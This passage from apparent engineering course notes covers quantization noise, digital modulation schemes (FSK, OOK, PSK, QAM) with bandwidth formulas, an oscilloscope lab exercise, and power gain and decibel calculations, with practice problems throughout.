the quantization levels. The figure below is the same analog signal quantized with 4-bits per sample. Note the step-size is smaller than in the 3-bit plot, (½ the size), and the noise signal is approximately ½ the amplitude of what it was with 3-bit quantization. The reconstructed signal looks much closer to the original analog signal compared to the 3-bit A/D. It is worth noting that increasing the sampling frequency will not reduce quanitzation noise, only increasing the number of quantization levels will do this. 486 We of course can’t use an infinite number of bits, so some quantization noise is always inevitable, but the nice thing about the human ear/brain - sticking with the example of audio signals - is that beyond a certain number of bits for each sample, the associated quantization noise becomes imperceptible. We just need enough bits to make the recovered signal “good enough” (e.g., the recovered music sounds “good enough”). 487 488 Problems 1. What is the greatest advantage that digital communication has over analog communication? 2. Describe the function of a regenerative repeater. 3. What is the cause of aliasing in the A/D process? 4. Why does a 5-bit quantizer produce a better approximation to an analog signal than a 3-bit quantizer? 5. A music signal has frequency content from 0 Hz up to 18.75 kHz. What sampling frequency must be exceeded for successful A/D conversion? What is another name for the minimum sampling frequency? Consider the following analog waveform. This waveform is to be sampled at a 1-kHz rate and quantized with a 3bit quantizer (input voltage range is -1.0 to +1.0 V). a. b. c. d. e. What is the resolution (q) of this quantizer? Circle the sample points on the analog waveform below. Indicate the quantization intervals and corresponding digital words. Indicate the digital word assigned to each sample point. When a receiver receives the transmitted bits, D/A is used to recover the analog signal, but the recovered signal 1.000 0.750 0.500 Voltage (V) 6. 0.250 0.000 -0.250 -0.500 -0.750 -1.000 0 1 2 3 4 5 6 7 8 Time (ms) is not the same as the original analog signal. What is the term to describe this difference and what can be done to minimize this difference? 7. Consider the following analog waveform. This waveform is to be sampled at a 1.333333 MHz rate and quantized with a 3-bit quantizer (input voltage range is -2.0 to +2.0 V). a. b. c. d. What is the resolution (q) of this quantizer? Circle the sample points on the analog waveform below. Indicate the quantization intervals and corresponding digital words. Indicate the digital word assigned to each sample point. 489 2 1.5 1 amplitude (V) 0.5 0 -0.5 -1 -1.5 -2 0 0.5 1 1.5 2 2.5 time (microsec) 490 3 3.5 4 4.5 5 Chapter 22: Digital Modulation Objectives: (a) Quantitatively describe the relationship between a symbol and a bit and the bit rate and the baud. (b) Describe how digital information is conveyed using various digital modulation techniques (ASK or OOK, FSK, PSK and QAM) and recognize their waveforms, and constellations. (c) Calculate the bandwidth of an ASK, FSK, PSK, or QAM signal. (d) Using a constellation diagram analyze a M-ary PSK signal to determine its symbols and bits per symbols. (e) Discuss the effect of noise on M-ary PSK and how Quadrature Amplitude Modulation (QAM) overcomes these detrimental effects. 1. Digital Signal Frequency Spectrum In Chapter 21, it was mentioned that in many cases, we wished to convert analog signals into digital signals to take advantage of the benefits of digital technologies. Samples of the analog signal were converted into bits and the bits were then used to create a binary voltage waveform that represented the bits. If we then wanted to transmit this digital waveform through free space, then all we need to do is connect it to an antenna, right? No, it is not that easy. The binary voltage waveforms to which we are so accustomed are, typically, voltage pulses that alternate between 0V (for a 0-bit ) and 5V (for a 1-bit). It just so happens that the preponderance of frequency content in these voltage pulses is very low (a baseband signal), and just like was pointed out for voice signals (which also have low frequency content), an antenna needed to transmit this kind of signal through free space would be impractibly large. For a large number of random voltage pulses, the frequency plot would look something like the following, where Rb is the value of the bit rate in Hz. For example, if the bit rate were 500 bps, then the frequency content magnitude would be equal to zero at 500 Hz, 1000 Hz, etc. This plot of frequency content is much different than that of a signal composed of sinusoids! There are no spikes! Nevertheless, most of the frequency content is at very low frequencies. The frequency content does continue out to an infinite frequency, although the magnitude drops dramatically at higher frequencies. In a perfect world, we’d say the bandwidth of voltage pulses approaches ∞ Hz, but for digital signals, we’ll use the null-bandwidth as our calculated bandwidth. The nullbandwidth is defined as the amount of the frequency spectrum (in Hz) from the maximum magnitude (which occurs at 0 Hz) to where the spectrum first goes to a magnitude of 0 (called a null, here at Rb Hz). The bandwidth is given by: BW = f2 - f1 = Rb - 0 = Rb Hz . We must come up with a method to transmit the digital information (1s and 0s) using radio waves. Digital modulation techniques allow this. As you recall, the goal of modulation is to upshift the frequency spectrum of the information signal to allow transmission through free space; the transmitted signal’s frequency spectrum would then look like the following. 491 Recall that, like in analog amplitude modulation, the information signal’s frequency spectrum is shifted up by fc Hz, and there is a mirror image of the frequency content on the left side of fc. The transmission bandwidth (using the null-bandwidth definition) is now BW = f2 - f1 = ( fc + Rb ) - ( fc - Rb ) = 2Rb Hz 2. Binary Digital Modulation Recall the equation for a high frequency carrier: vc(t)=Vc sin(2πfct + θ). As discussed in Chapter 20, a sinusoidal carrier can be modulated by varying its amplitude, frequency, or phase using an information signal. So, how do we go about representing 1s and 0s with modulation? Just as we can vary amplitude, frequency, and phase of a high-frequency carrier in accordance with an analog waveform, we can do the same with a digital waveform. Since bit values shift between 0s and 1s, digital modulation techniques that vary the carrier’s amplitude, frequency, and phase are referred to as “shift keying.” Frequency Shift Keying (FSK) Frequency-shift keying (FSK) is a frequency modulation scheme in which digital information is transmitted through discrete frequency changes (shifts) of a carrier wave. The simplest form of FSK is Binary FSK (BFSK), in which a carrier’s frequency is shifted to a low frequency or a high frequency to transmit 0s and 1s. The plot below shows a sample FSK signal along with the associated bits. An example of how FSK was used “back in the day” was with dial-up modems to connect your home computer to your Internet service provider over your analog phone. With a modem, a 0-bit was represented with a lower frequency carrier of 1070 Hz and a 1-bit was represented with a higher carrier frequency of 1270 Hz. The lower frequency, binary 0, was called the “space” frequency while the higher frequency, binary 1, was called the “mark” frequency. The terms mark/space were a throwback to the days of Morse code or flashing light communications. In the frequency domain, we consider FSK to be two different digital transmissions, one at the mark frequency (the higher frequency) and one at the space frequency (lower frequency). The resulting frequency plot would look like the following, with the carrier frequency being shifted between the mark and space frequencies. The amount that the carrier frequency can be shifted is called the frequency deviation (Δf). To determine the bandwidth for FSK modulation, we take a closer look at the frequency spectrum around the mark and space frequencies. We use the nullbandwidth definition to compute the bandwidth as shown below. In the figure, the bandwidth effectively runs from the first null to the left of fspace to the first null to the right of fmark. Mathmatically, there are two equations that can be used to compute the bandwidth: BW = ( fmark + Rb ) - ( fspace - Rb ) = fmark - fspace + 2Rb or BW = 2(Df + Rb ) 492 Practice Problem 22.1 You have an FSK transmitter using a carrier of 500 kHz sending 10 kbps and a frequency deviation of 100 kHz. How much bandwidth do you need for your transmission? Of course, who still uses dial-up? What else is there? Amplitude Shift Keying (ASK) and On-Off Keying (OOK) Amplitude Shift Keying is a form of amplitude modulation that represents digital data as shifts in the amplitude of a carrier wave: for example, small amplitude for a 0-bit, and larger amplitude for a 1-bit. We have seen what an ASK signal has looked like before in Chapter 21, repeated below. The simplest digital modulation scheme is a form of ASK called on-off keying (OOK). This is analogous to Morse code. In OOK, a carrier is transmitted for a 1-bit and nothing is transmitted for a 0-bit; this is the same as saying that the smaller ASK amplitude is 0. Note that in all forms of ASK, the frequency and phase of the carrier are the same for all outputs; it is the amplitude that changes. Practice Problem 22.2 Sketch an OOK signal that represents the bit stream below. 1 0 0 0 1 1 Before we continue, you need to learn some important terms that used in digital communication systems. The information is carried in the bits that are transmitted, but we don’t actually transmit bits; we transmit waveforms that represent bits. These waveforms are commonly referred to as symbols. On a wire, the symbols take the form of voltage pulses. In FSK and OOK, the symbols take the form of a high frequency carrier that has its frequency or amplitude altered based on whether a 0-bit or a 1-bit is being transmitted. In these modulation schemes, the number of symbols that can be transmitted (M) is two (M = 2) and each symbol represents one bit of data. For FSK and OOK, the time duration of a bit is the same as the time duration of a symbol (Tb = Tsym). We will soon see other digital modulation schemes where a symbol can represent more than one bit. In general, the number of symbols for a modulation type is related to the number of bits associated with each symbol. If N is the number of bits per symbol, 493 M = 2 N and N = log2 M. The relationship between bits and symbols for an OOK signal is shown in the next figure for an OOK signal. Bitrate (Rb) is the speed of transfer of data (number of bits per second). Bitrate is inversely related to bit duration (Tb), which is the time required to transmit a single bit. 1 Rb = Tb Baud (also referred to as Symbol Rate) (Rsym) is the number of symbols transmitted per second, and is inversely related to the Symbol duration (Tsym), which is the time required to transmit one symbol. 1 Rsym = Tsym The Bitrate and the Baud (or Symbol Rate) are related by the number of bits per symbol (N). Rb = Rs ´ N The bandwidth associated with OOK is what we have seen before, BW = 2Rb, as shown in the figure below. As you’ll see shortly, the symbol rate (Rs) has a noted effect on the bandwidth required for transmission. In general, for all digital modulation schemes that we will discuss (except for FSK), bandwidth is given by: BW = 2Rb . N In the case of OOK, since N = 1 bits/symbol, BW = 2Rb = 2Rs, as stated before. For example, for OOK, if the bitrate is 600 kbps, the symbol rate is 600,000 symbols/sec, and the bandwidth is 2(600,000) = 1.2 MHz. Phase Shift Keying (PSK) Phase shift keying (PSK) is a form of phase modulation where the carrier’s phase shifts to one of a finite set of possible phases based on the bits that are input. For binary phase shift keying (BPSK), the carrier phase is shifted between one of two phases (typically 0 and 180) depending on whether a 0-bit or a 1-bit is being transmitted. For example: 0-bit: the symbol transmitted is Vc sin ( 2p fct ) . 1-bit: the symbol transmitted is Vc sin ( 2p fct +180°) = -Vc sin ( 2p fct ) It is important to point out that in PSK, the amplitude of all output symbols is the same; it is the phase of the output symbols that are different. 494 Up to this point we have discussed digital modulation with one bit per symbol, which means that at any time, one of two possible symbols would be transmitted. But as mentioned earlier, it is possible to have a modulation scheme with more than one bit per symbol; this is referred to as M-ary digital modulation. 3. M-ary Digital Modulation Before launching into more complicated digital modulation, we’ll introduce a graphical way to relate output symbols to the bits they represent. This is called a constellation diagram. A constellation is a plot of relative amplitude and phase of the output symbols for a digital modulation system. Each dot describes a symbol which is represented by its polar coordinates. In terms of phase, 0° is along the positive x-axis, and phase increases as you move counterclockwise around the x-y plane. Relative amplitude is measured as distance from the origin of the plot. The possible output symbols are represented with filled-in circles, and adjacent to them are the bits they represent. For example, here are two possible BPSK systems’ constellation diagrams. In BPSK, the output symbols both have the same amplitude (both of the symbols are equidistant from the origin), but their phases are 180° apart. There are other possible combinations of two carrier phases that might be used (such as +90° and -90°), but the actual constellation used is not important, as long as the transmitter and receiver use the same constellation. Note that BPSK transmits 1 bit per symbol, so only one bit value is placed next to each symbol. If it is desired to get the information from the transmitter to the receiver faster, we need to increase the number of bits per second (bps) that are transmitted. The cost of increasing the bitrate (besides requiring more complex components) is that it increases the transmission bandwidth: recall that for OOK BW = 2Rb, and from Chapter 19, that bandwidth can be expensive! Is there a way to transmit a higher bitrate but using a smaller transmission bandwidth? The answer is yes, using M-ary digital modulation. In M-ary modulation, we can preserve bandwidth if we keep the symbol rate the same and increase the number of bits per symbol. For example, instead of transmitting just 2 possible phase shifts (0˚and 180˚), we could transmit one of 4 possible phase shifts per symbol. This is called quadrature phase shift keying (QPSK). Quadrature Phase Shift Keying (QPSK) In QSPK, there are 4 symbols (M = 4) and there are 2 bits per symbol (N = 2 = log2M). Two of the many possible constellation diagrams for QPSK are shown in the following figure, and the four symbols from QPSK Constellation #2 are shown to the right of this constellation. The carrier with a phase of 0˚ is plotted in a dashed red line with each symbol for reference. The four symbols in the righthand constellation are: sin(2p fct + 45°), sin(2p fct +135°), sin(2p fct -135°), andsin(2p fct - 45°). 495 The following figure is a plot of the use of QPSK constellation #2 to transmit the bit stream 0001111000110110. Also shown is the bit duration, and the symbol duration for QPSK. The frequency spectrum for M-ary modulation schemes is shown in the figure below, which also specifies the frequency axis for QPSK. If the bitrate is constant, the benefit of transmitting more than one bit in a symbol can be seen in the fact that the nulls are closer to the carrier frequency. From the figure, it is seen that the bandwidth for QPSK is given by R ö æ R ö æ BW = ç fc + b ÷ - ç fc - b ÷ = Rb Hz. è 2ø è 2ø This is confirmed by the equation for bandwidth for all digital modulation schemes (except for FSK), 2R BW = b N where N = 2 for QPSK. For example, if bitrate is 600 kbps, BW = 2(600,000)/2=600 kHz. M-ary PSK We can further increase the number of bits per symbol by increasing the number of possible phase shifts. The M in M-ary refers to the number of symbols. Consider the 8-PSK constellation to the right (one of many possible 8-PSK constellations). How many bits per symbol are transmitted? There are 8 symbols (M = 8), so N = log2M = log28 = 3 bits/symbol. This is also evident from the diagram because the three bits associated with each symbol appears next to the symbol. What is the bandwidth for 8-PSK? Since N=3 bits/symbol, Bandwidth is given by 2R 2R BW = b = b . N 3 For example, if the bitrate is 600 kbps, bandwidth for 8-PSK is BW = 2(600,000)/3 = 400 kHz. We could further increase to 4 bits/symbol using 16-PSK. Here, M = 16 and N = 4 bits/symbol. A 16-PSK constellation is shown to the right, where each phase is separated by 360o/16 = 22.5o. More complex M-ary PSK modulation is possible: 16PSK, 32-PSK, etc., but it becomes more susceptible to noise as the symbols get closer together. As a reminder, for PSK, all of the symbols have the same carrier frequency and amplitude; it is their phase that is different. For that reason, on a constellation diagram, all of the symbols for PSK appear on a circle about the origin. 496 To demodulate any type of PSK, a receiver must determine the phase of the received symbol. For 16-PSK, the receiver must determine the phase within 11.25˚, since the phases are separated by 22.5o. A portion of the constellation diagram for 16-PSK is shown to the right, indicating the wedge of phase values that separates one of the symbols from the adjacent symbols. Noise Effects Recall that the number one most limiting factor in communication systems is noise. In all transmissions, the received signal will be degraded by noise. The following figure shows a BPSK signal and the same signal corrupted by noise. You might imagine that it is harder for a receiver to determine the correct phase (correct symbol) that was transmitted for the noisy signal. This noise corruption can be depicted in the constellation diagram to the right, where the two transmitted BPSK symbols are indicated in the two large black circles (phase = 0° and phase = 180°), and noisy received symbols are the red and blue circles. A BPSK receiver must make a decision to determine the phase of a received signal to determine the corresponding bit. You may imagine that if the noise is severe enough, a receiver might make a mistake, and decide that it had received a 0-bit when it actually received a 1-bit. These are called bit errors. Now, consider the same noise in the presence of an 8-PSK signal. Is it easier for the receiver to make bit errors? Yes, as more phases are used in PSK, the symbols are closer together, which makes it easier for the receiver to make bit errors (see the figure to the right). But, of course, the advantage of more symbols is a narrower bandwidth, if the bitrate is held constant. There is a way to use more symbols in modulation while reducing the chances of making bit errors; by using symbols that have different amplitudes AND phases. Quadrature Amplitude Modulation (QAM) In order to increase the distance between symbols in the constellation, another option is to modulate both the amplitude and the phase. This is called Quadrature Amplitude Modulation (QAM) 8-QAM An 8-QAM constellation is shown below (one of many possible 8-QAM constellations). The eight symbols along with the 3bit digital words corresponding to each are shown to the right of the constellation. This system uses 2 possible amplitudes and 4 possible phases. In 8-QAM, the duration of a symbol is three times the duration of a bit (since each symbol carries 3 bits). Note that there are both phase and amplitude changes for each symbol. 497 What is the bandwidth for 8-QAM? The same as for 8-PSK, since the bandwidth for all digital modulation types (except for FSK) is given by 2R BW = b N And it doesn’t stop there. Higher level QAM signals QAM signals can be extended to have a larger number of signal symbols, which then gives a much higher bit rate (because there are more bits per symbol). 64-QAM and 256-QAM are common in cable modems, satellites, and high-speed fixed broadband wireless. In 256-QAM, you find that for each symbol you are transmitting (there are 256 symbols), there are 8 bits of information. Assuming the symbol rate remains constant, that means that for the same bandwidth, you are sending 8 times more information when you use 256-QAM than when you use OOK, FSK, or BPSK. For 256-QAM, if the bitrate is 600 kbps, the bandwidth is 2(600,000)/8 = 150 kHz. Now that’s powerful! 498 Practice Problem 22.3 90˚ Using the signal constellation shown, answer the following questions. a) What type of modulation does this represent? b) How many symbols are represented (M)? 180˚ c) 0˚ How many bits per symbol are used (N)? d) If the Baud Rate is 10,000 symbols/second, what is the bit rate (Rb)? e) Would 16-QAM be more or less susceptible to noise than this type of modulation? 270˚ Practice Problem 22.4 Label the modulation schemes. (there are 2 symbols here) (there are 4 symbols here) 499 500 Problems 1. For an ASCII ‘Z,’ sketch both the On-Off Keying (OOK) binary waveform (voltage pulses) and the modulated signal, where the amplitude of the carrier is modulated to either 10 V or 0 V and Tb = 100 ms. Hint: use the ASCII table from Chapter 1 of the course notes to determine the bits that represent ‘Z’. 2. Given this FSK transmission where individual symbols are denoted by vertical lines: a. Draw the corresponding binary transmission (voltage pulses), assuming that the higher frequency represents a 1-bit: 3. b. Determine the bit rate. c. How many bits per symbol could be conveyed if four different frequencies were used to transmit data instead of two (that is, if 4 symbols were used vice 2 symbols)? The following is a BPSK transmission. The dashed vertical lines separate the bits. On this plot, a binary ‘1’ is represented by this signal: a. Determine the transmitted bits. b. Determine the bit rate. c. What is the bandwidth for this transmission? 4. QAM is a combination of which two types of modulation? 5. The “forward” signal transmitted to control a remotely-controlled (RC) car is captured on an oscilloscope and displayed below. Answer the following questions with regards to this signal: a. This modulation is binary, meaning that there are two possible symbols. What type of digital modulation is being used? 501 6. b. What is the bit rate? (Hint: Two time cursors are shown on the display as the two dashed vertical lines…these cursors isolate a single bit. Also shown are some measurements about the time cursors below the plot and to the c. What bit sequence is represented by the O-scope display? 16-QAM can be used for higher data rate transmissions. a. How many bits are transmitted with each symbol? b. If 4 different phases and 4 different amplitudes are used in a 16-QAM modulation system, sketch a constellation diagram that could be associated with the system (you do not need to label the bits for each symbol, just show the symbols). c. If 8 different phases and 2 different amplitudes are used in a 16-QAM modulation system, sketch a constellation diagram that could be associated with the system(you do not need to label the bits for each symbol, just show the symbols). d. If the bit rate associated with either of these 16-QAM systems was 1.2 Mbps, what is the bandwidth of the transmission? 7. For a given bandwidth system, what is the advantage and disadvantage of using a multi-symbol encoding scheme (that is, using more than 2 symbols)? 8. A communication system transmits 100 kbps. For each of the following modulation types, determine the bandwidth of the transmission. 9. a. FSK, with frequency deviation 200 kHz. b. OOK. c. QPSK. d. 16-PSK. e. 16-QAM. f. 512-QAM. Suppose the FCC has leased you the portion of the frequency spectrum from 1.2 MHz to 1.3 MHz for your free-space communication system. What is the maximum bitrate you could obtain if you used the following modulation schemes: a. FSK, with fmark = 1.23 MHz and fspace = 1.27 MHz. b. ASK. c. BPSK. d. 8-PSK. e. 32-QAM. f. 256-QAM. 502 Security Exercise 22 Digital Modulation: OOK and FSK Discussion: A baseband signal is not compatible with free-space communication. Therefore, we need to modulate the binary 0s and 1s. Digital modulation is different from analog modulation in that the analog carrier signal is modulated by voltage pulses that represent 0s and 1s. Objective: To provide hands on experience and further familiarize each Midshipman with some of the aspects of the simplest form of Amplitude Shift Keying (ASK), known as On Off Keying (OOK), as well as Frequency Shift Keying (FSK). I. On-Off Keying (OOK) In OOK, the amplitude of the digital signal controls the carrier signal, so that the carrier is turned on to represent a 1-bit and turned off to represent a 0-bit. Using your familiarity with the oscilloscope ( o-scope) and function generator from your previous labs, set up the Function Generator with the following settings: □ □ □ □ □ □ □ □ □ □ □ □ Press the Utility button and set your Output Setup to High Z. Select the sinusoidal function by pressing the Sine button. o Freq = 300 kHz (this will be the carrier frequency, fc) o Ampl = 1 Vrms Push Mod button with the following settings: o o o o o TYPE = AM SOURCE = Int AM Depth = 100% AM Freq = 10 kHz (this will be the bit rate) SHAPE = Square Connect the function generator Output (red to red, black to black) to CH 1 of the o-scope Connect the function generator Sync (red to red) to CH2. Push Output button to send the signal to the o-scope. Push AUTOSET on the o-scope. Adjust the o-scope with CH 2 on top (square wave) and CH 1 (carrier) on the bottom using the vertical positions on CH1 and CH2. Push the Trig Menu button on the o-scope and use the following settings: o TYPE = Edge o SOURCE = CH 2 o SLOPE = Rising o MODE = Auto o Coupling = AC Note: You may need to adjust the Trigger level arrow to stabilize your display. Push CH 1 MENU to return. Adjust the horizontal range and vertical ranges to 25 µsec per division, Adjust CH 1 and CH 2 vertical scale (volts/div) so that you see a display similar to the Fig. 1 that follows. Note: Your scope display should look similar to Figure 1, below, except your digital signal is a square wave, 101010… Figure 1 503 Question 1: Looking at CH1 and using the time cursors, measure carrier period and then calculate the carrier frequency, fc. Recall that the carrier is the rapidly changing sinusoid. Question 2: Looking at CH2, measure the bit duration Tb, then calculate the bitrate, Rb. □ Change the o-scope to display the frequency domain by choosing MATH MENU and using the following settings: o o o OPERATION = FFT SOURCE = CH 1 50 kHz per Division The o-scope should look similar to the Figure 2 below. Figure 2 Question 3: Find the carrier frequency from the o-scope display (hint: use the frequency cursor). □ Use the frequency cursors to measure the bandwidth (hint: the bandwidth is determined by the first null to the left and right of the carrier). Question 4: What is the bandwidth of the OOK signal (when fm = 10 kHz—that is, when Rb = 20 kbps)? □ □ Change the AM Freq on the frequency generator to 20 kHz (so you are increasing your bit rate to 40 kbps). Measure the bandwidth of the signal between the first pair of sideband, as done in the previous step. Question 5: Now, What is the bandwidth of the OOK signal (when fm = 20 kHz)? Question 6: Based on the Questions 5 and 6, as the bit rate increases describe what happens to the bandwidth of the signal? Remember that the equation for the bandwidth of an OOK signal is BW = 2Rb . N Your findings should be supported by this equation! II. Frequency Shift Keying (FSK) Frequency shift keying (FSK) is another digital modulation technique in which a continuous sine wave changes frequency when the digital bit stream changes between zero and one. The higher frequency represents a binary ‘1’ (also called mark) and the lower frequency represents a binary ‘0’ (also called space). FSK is used primarily in low speed applications (<500 Kbps) and noisy environments where accuracy is preferred over speed. Keep the carrier frequency the same (fc is still 300 kHz), but change the modulation mode to FSK using the following steps: □ □ Use the following modulation settings on the function generator (Mod): o TYPE = FM o SOURCE = Int o FREQ DEV = 200 kHz (this is frequency deviation, Δf). o FM Freq = 10 kHz (this is the bit rate, Rb). o SHAPE = Square Push CH 1 MENU on the o-scope to return to the time domain. 504 □ Set horizontal scale to 25 µs per division. Note: Your display should look similar to Figure 3, below, where a 1-bit is represented by a sinusoid with a frequency higher than the carrier’s (called the mark frequency) and a 0-bit with a frequency lower than the carrier’s (called the space frequency). Figure 3 □ Adjust the picture on the o-scope to answer the next question by changing the horizontal range setting (sec/div) and using the time cursors to measure the periods of the two sinusoids. Question 7: What is the mark frequency, fmark? What is the space frequency, fspace? □ □ To see the difference in the bandwidth for the FSK signal, shift to the frequency domain. Push the MATH MENU button and use the following settings: o OPERATION = FFT o SOURCE = CH 1 o 125 KHz per Division Measure the bandwidth between the sidebands (approximately) as shown in Figure 4. This is based on the first peak to the left of fspace and the first peak on the right of fmark. Figure 4 Question 8: What is the measured bandwidth (hint: your answer should be much larger than your answer for the OOK bandwidth) ? Remember that the equation for the bandwidth of an FSK signal is BW = ( fmark + Rb ) - ( fspace - Rb ) = fmark - fspace + 2Rb or BW = 2(Df + Rb ) Your answer should be supported by this equation! □ Change the FM FREQ to 20 kHz (now Rb = 40 kbps) and measure the bandwidth of the signal as shown in Fig. 4. Question 9: What is the new bandwidth? Question 10: Based on the above change, as the bit rate (Rb) increases, describe what happens to the bandwidth of the signal. What can you say about the comparisons of the bandwidths for FSK as compared to OOK? □ Turn off your equipment and clean up your lab bench. 505 506 Security Exercise 22 Answer Sheet Name: _________________________________________________________________________________________________ Question 1: _________________________________________________________________________________________________ Question 2: ________________________________________________________________________________________________ Question 3: ________________________________________________________________________________________________ Question 4: _________________________________________________________________________________________________ Question 5: _________________________________________________________________________________________________ Question 6: _________________________________________________________________________________________________ Question 7: _________________________________________________________________________________________________ Question 8: _________________________________________________________________________________________________ Question 9: _________________________________________________________________________________________________ Question 10: _________________________________________________________________________________________________ 507 508 Chapter 23: Power Gain and SNR Objectives: (m) Define gain and attenuation and describe their application to communications. (n) Calculate power gains for single and multiple stage systems; determine power at each stage. (o) Express power gain in dB, and power levels in dBW and dBm. Compute power gain and power from dB, dBW and dBm. (p) Calculate signal to noise ratio (SNR) and discuss the impact of noise in a communication system. Connection to Cyber Security Communication systems transmit electrical (EM) signals to convey information. The strength of a signal is based on its electrical power, and the transmit power is an important consideration in how far a signal can be transmitted through the atmosphere. In addition, the received power is important factor in how accurately an information signal can be recovered; if the received power is not high enough to overcome the noise present, then information will be lost. Cyber security attacks against wireless communication systems can take advantage of the frequencies and modulation types of the transmission (Chapter 22), but also the power that is received by a receiver. These attacks take the form of jamming, and possibly taking control of devices that are controlled via a wireless communication link if the received control signals from the actual transmitter are weaker than the received power from a hacker’s signal. In 2011, Iran captured a US unmanned aerial vehicle (UAV) while inflight, claiming that their cyberwarfare unit had commandeered and safely landed the UAV. This chapter introduces the power aspects of wireless communication. 1. Gain/Attenuation. Electrical power is measured in Watts (W), and your typical flat screen TV uses maybe 250 W while it is on, and your laptop may use 60 W while it is running heavy-duty programs. In wireless communications, it may take an incredibly large transmit power to cover the distance to the receiver, and even then, the power arriving at the receiver may be incredibly small. For example, a commercial FM station may transmit 15.5 kW of signal power to reach your car’s radio, and by the time it gets to your car’s antenna, the received power may be on the order of 1 pW (10 -12 Watts). This means that the transmitted power has dropped by a factor of approximately 10 16. Consider a satellite ground station (on Earth), transmitting to another ground station on the other side of the Earth via a geostationary satellite, 22,300 miles away. This is an immense distance to transmit over to reach the satellite! How about NASA’s New Horizon space probe mission currently on its way to the planet Pluto…it will be transmitting information back to Earth nearly 4 billion miles away! So how are you going to get your signal to travel further? Turn up the power. But modulators that produce PSK or QAM typically do not produce signals of substantial power; instead we use devices called amplifiers to increase the power of the modulated signals (that is, to amplify them) so that they are strong enough to cover the required distances. The term power gain refers to the factor that the power is increased in a signal as it goes through an amplifier. The power gain (AP) is the ratio of the output signal power to the input signal power. In a block diagram of a communication system, an amplifier is typically drawn as a triangle (although rectangular blocks are also used), as in the following figure. To calculate power gain (AP) where Pin is the power input and Pout is the power output, we use the equation: AP = Pout . Pin An amplifier can take a modulated signal and increase its power large enough to transmit many miles, much like the above example of a FM radio broadcasting tower transmitting at 15.5 kW. There are, however, some components of communication systems can also reduce the power of a signal. Reduction of the power of a signal (signal loss) is termed attenuation. Attenuation is still computed using the equation for power gain, but a component that attenuates has a power gain that is less than 1.0. 509 Putting together what we’ve learned, we have our modulated signal feeding into an amplifier that increases the power of the signal. The signal is broadcast out of the transmitter via an antenna, where the signal is attenuated as it travels through the air to the receiver’s antenna. Finally the significantly reduced signal is picked up by the receiver, and the receiver recovers the information. This is depicted in the following diagram for an ASK system. Practice Problem 23.1 The input power of an amplifier is 6 W. The power gain is AP = 80. What is the output power? Practice Problem 23.2 The input power is 15.5 kW. The power output is 10 -15 W. Is this system associated with amplification or attenuation? What is the gain (or attenuation) of this system? You may have noticed that there can be a large disparity in the power values between transmitter and receiver, and dealing with incredibly large and incredibly small values in the same system is challenging. For this reason, in many cases we deal with decibel values instead of the numeric values. 2. Decibels. As engineers, we just want our lives to be as easy as possible. So rather than work with these terribly tedious numbers, we often convert the numbers into decibels (dB). The decibel is a logarithmic measure that provides more convenient gain and attenuation values by changing them to a logarithmic scale. The benefit of a log scale is that it can map a very large range of decimal values into a small range of decibel values. Consequently, small changes in decibel quantities may mean very large changes in power (we’ll revisit this in the accompanying security exercise). To convert a decimal value X into decibel value XdB is given by: XdB = 10 log10 (X) . If X is a value greater than 1.0, then XdB will be a positive value, and if X is a value less than 1.0, XdB will be a negative value. The decibel value of zero is negative infinity and the decibel is undefined for negative values. For power gain (or attenuation) then: 510 æP ö AP,dB = 10 log10 (AP ) = 10 log10 ç out ÷ . è Pin ø So then for the above practice problem that gave us a headache, we see: æP ö æ 0.000000000000001 W ö AP,dB = 10 log10 ç out ÷ = 10 log10 ç ÷ø = -181.9 dB è 15,500 W è Pin ø Practice Problem 23.3 Convert these two power gains to decibels (dB). AP =1000 AP =0.0001 A couple of very common values of power gain are 2 and ½. A power amplification by a factor of two (AP = 2) will result in a power gain of +3 dB. AP,dB = 10log10 (AP ) = 10log10 (2) = +3 dB An attenuation by a factor of one-half will result in a power gain of -3 dB. AP,dB = 10log10 (AP ) = 10log10 (0.5) = -3 dB How do you find the decimal value corresponding to a decibel value? Just rearrange the dB equation from earlier and you get: AP,dB = 10 log10 (AP ) AP = 10 ( AP )dB 10 Practice Problem 23.4 Convert the following power gains from decibels to decimal gains. AP,dB = 25 dB: AP = AP,dB = -6 dB: AP = Power gain is a ratio of two powers, Pin and Pout, each with a unit of power, usually W or mW. When taking this ratio, the units of power cancel, and you’re taking the log of a unitless ratio. Logarithms only work with numbers, not units. In communications, we are sometimes asked to compute the decibel value of a power level (in W or mW). In this case, you will take the log of that power level with respect to a fixed reference power level, either 1 W or 1 mW so that the units cancel and you’re just taking the log of a number. dBm: The number of decibels of power relative to 1 mW. The reference power level is 1 mW and the dBm value is expressed mathematically as æ P ö æ PW ö . PdBm = 10 log10 ç mW ÷ or PdBm = 10 log10 ç è 1 mW ø è 0.001 W ÷ø 511 If the power value to compute is already in mW, the first equation can be used, and if the power value is in W, then the second equation can be used. In this case, since 1 mW = 0.001 W, the units will cancel. dBW: The number of decibels of power relative to 1 W. The reference power level is 1 W and the dBW value is expressed mathematically as æ P ö PdBW = 10 log10 ç W ÷ . è 1 Wø In all cases, the units of power must cancel so that the resulting ratio is unitless. Also, if given a dBm or dBW value, the power in mW or W can be found from: P(in mW) = 10 P ( dBm ) 10 or P(in W) = 10 P ( dBW ) 10 . Practice Problem 23.5 Express Pin = 2 W in decibels as both dBm and dBW. Pin,dBm = Pin,dBW = Practice Problem 23.6 Express 25 dBm in terms of mW and W. P(in mW) = P(in W) = Besides compressing a large range of values into a smaller range of decibel values, another benefit from using decibels is the mathematics involved in combining decibel terms; decibel values are added or subtracted instead of multiplying or dividing. This is typically seen in communication systems that cascade amplifiers as in the following figure. Here, the output power after each amplifier is computed as the product of the power into that amplifier and its power gain. So, if we leave the gains in ratio form, then the total gain of the system will be the product of all the gains multiplied together, and we could rewrite this cascade of three amplifiers as a single amplifier with power gain AT. In terms of decibels, the overall decibel gain of a cascade of amplifiers can be found as follows: AT ,dB = 10log10 (AT ) = 10log10 ( AP1 × AP2 × AP3 ) . 512 Using the property of the log function that the log of a product is the sum of the logs, we have: AT ,dB = 10 log10 ( AP1 × AP 2 × AP 3 ) = 10 log10 (AP1 ) +10 log10 (AP 2 ) +10 log10 (AP 3 ) = AP1,dB + AP 2,dB + AP 3,dB Also, we could use the property of the log function that the log of a quotient is the difference of the logs to write the following equation: . In this equation, the input and output powers must be in the same decibel units, either dBW or dBm. Note that the difference between two dBm or dBW values will result in a dB value. Applying the log of products property to a cascaded system of amplifiers, Pout , dBm = 10 log10 ( Pin × AP1 × AP2 × AP 3 ) = 10 log10 (Pin ) + 10 log10 (AP1 ) +10 log10 (AP 2 ) + 10 log10 (AP 3 ) = Pin, dBm + AP1,dB + AP2,dB + AP 